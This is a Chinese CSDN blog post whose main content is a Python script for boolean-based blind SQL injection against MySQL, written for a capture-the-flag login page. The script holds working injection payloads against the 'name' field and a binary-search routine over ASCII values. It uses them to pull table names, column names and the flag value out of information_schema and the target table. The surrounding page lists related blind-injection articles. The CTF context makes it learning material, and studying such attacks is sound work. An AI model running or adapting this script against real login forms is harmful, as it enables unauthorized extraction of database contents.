SQL盲注脚本(MySQL)

最新推荐文章于 2024-07-22 19:59:07 发布
最新推荐文章于 2024-07-22 19:59:07 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rongyongfeikai2/article/details/121308541
版权

SQL注入 盲注攻击 Python 数据库安全 二分查找
关键词由CSDN通过智能技术生成 
#coding:utf-8
import urllib.request
import json

"""
SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题
"""

class SqlBlindInjection(object):
    def __init__(self):
        self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php"
        #条件为真的返回值
        self.TRUERTN = u"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"
        #条件为假时的返回值
        self.FALSERTN = u"\u8d26\u53f7\u4e0d\u5b58\u5728"
        #猜测位数
        self.GUESSNUM = 128
        #头部
        self.headers = {'Accept-Charset': 'utf-8', 'Content-Type': 'application/x-www-form-urlencoded'}

    def post(self, url, data):
        """
        发送post请求
        True:条件为真
        False:条件为假
        """
        req = urllib.request.Request(url=url, data=data.encode(), headers=self.headers, method='POST')
        response = urllib.request.urlopen(req).read()
        try:
            json_rtn = json.loads(response)
            if json_rtn["msg"] == self.TRUERTN:
                return True 
            elif json_rtn["msg"] == self.FALSERTN:
                return False
        except Exception as e:
            return self.post(url, data)

    def binary_search(self, url, data):
        """
        二分查找猜测
        """
        rtn = ""
        for i in range(1, self.GUESSNUM):
            #ascii可打印字符32~127
            start = 32
            end = 128
            mid = (start+end)//2
            while start < end:
                cdata = data%(i,mid,)
                if self.post(self.url, cdata):
                    start = mid + 1
                else:
                    end = mid
                mid = (start+end)//2
            if mid == 32:
                break
            rtn += chr(mid)
            print(rtn)
        return rtn 

    def guess_table(self):
        """
        猜测表名
        """ 
        data = "name=admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#&pass=1"
        table_name = self.binary_search(self.url, data)
        print(table_name)

    def guess_cols(self):
        """
        猜测列名
        """ 
        data = "name=admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),%d,1))>%d,1,0)#&pass=1"
        col_name = self.binary_search(self.url, data)
        print(col_name)

    def get_flag(self):
        """
        获得flag
        """
        data = "name=admin' and if(ascii(mid((Select flag from fl4g),%d,1))>%d,1,0)#&pass=1"
        flag = self.binary_search(self.url, data)
        print(flag)

if __name__ == '__main__':
    sql_blind_inection = SqlBlindInjection()
    #fl4g
    #sql_blind_inection.guess_table()
    #flag
    #sql_blind_inection.guess_cols()
    print(sql_blind_inection.get_flag())

rongyongfeikai2
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
写一个布尔盲注脚本
weixin_35752645的博客
01-01 500
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
MySQL—布尔盲注
一个普普通通的博客
03-01 1494
Mysql注入—布尔盲注
Sqli-labs Less5-Less6 (盲注
最新发布
beiweixiaotian66的博客
07-22 737
一丢丢小练习
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 1048
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
SQL注入之盲注(小白的学习)
lgsyydsa的博客
06-04 585
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL注入学习--GTFHub(布尔盲注+时间盲注+MySQL结构)
qq_73861475的博客
11-16 570
抓包爆破,原理还是和手工注入的一样都是一个字符一个字符的按顺序猜解数据库名、表名、列名、字段名、字段内容,猜解出来的结果需要一个字符一个字符的拼接起来,总体来说跟手工注入一样,只是不用一句一句反复的注入。原理都是一样的,都是先判断注入方式,再判断长度,之后根据长度一个一个的猜解拼接,只是用Burpsuite抓包爆破需要字典,爆破后的结果都是需要自己去按照顺序一个一个地拼接起来。要得到flag,脚本运行的时间就会很长,这里的两个脚本,第一个是单独爆破,第二个是直接一次性爆破要的时间就会更长。
SQL盲注medium.pdf
05-13
SQL盲注medium.pdf 本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个...
SQL住入原始脚本_SQL注入python脚本_
10-03
它支持多种数据库类型,包括MySQL、PostgreSQL、Oracle等,并且可以执行各种类型的SQL注入攻击。在提供的压缩文件中,`less14_exp.py`, `less9_exp.py`, `less6_exp.py`很可能是SQLmap的示例脚本或插件,分别对应...
PHP+MYSQL 注入靶场
04-26
靶场中的**字符型注入**是直接通过可见的SQL语句进行的,而**SQL盲注**则更加隐蔽,攻击者需要通过判断查询结果的真伪来获取信息,通常包括基于时间的盲注和基于错误的盲注。 **PHP**是一种广泛使用的服务器端脚本...
软件安全实验2 SQL注入实验
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File ...SQL盲注)、XSS(Reflected)(反射型跨站脚本)、XSS(Stored)(存储型跨站脚本)...
sql注入靶场.zip
06-24
此外,了解不同数据库系统(如MySQL、PostgreSQL、Oracle)的特性也十分有用,因为不同的数据库系统可能对SQL注入的处理方式不同。 对于错误基线注入,攻击者会尝试通过引发服务器错误来获取关于查询结构的信息。...
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3621
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本
weixin_45116657的博客
08-25 4614
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3520
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1418
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
sql盲注python脚本
weixin_48266255的博客
08-29 462
【代码】sql盲注python脚本
SQL注入布尔盲注
qq_45557130的博客
10-04 767
sql注入布尔盲注
SQL注入入门进阶_报错注入、延时注入、python脚本盲注
菜鸟学安全的博客
01-17 771
本篇文章入门SQL注入,除了回显的SQL注入还存在报错注入、布尔盲注和延时注入。如果sqlmap跑不出来的还可以使用burp intrude注入或者使用python编写脚本注入。
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 752
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
通达OA SQL盲注利用:多线程+二分法提升效率
"这篇文档主要介绍了如何利用多线程和二分法来提高SQL盲注的效率,通过在Poc脚本中应用这些技术,针对通达OA系统2017版本的一个SQL注入漏洞进行利用,以获取管理员的sessionid并登陆后台。文章强调了使用者对由此...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值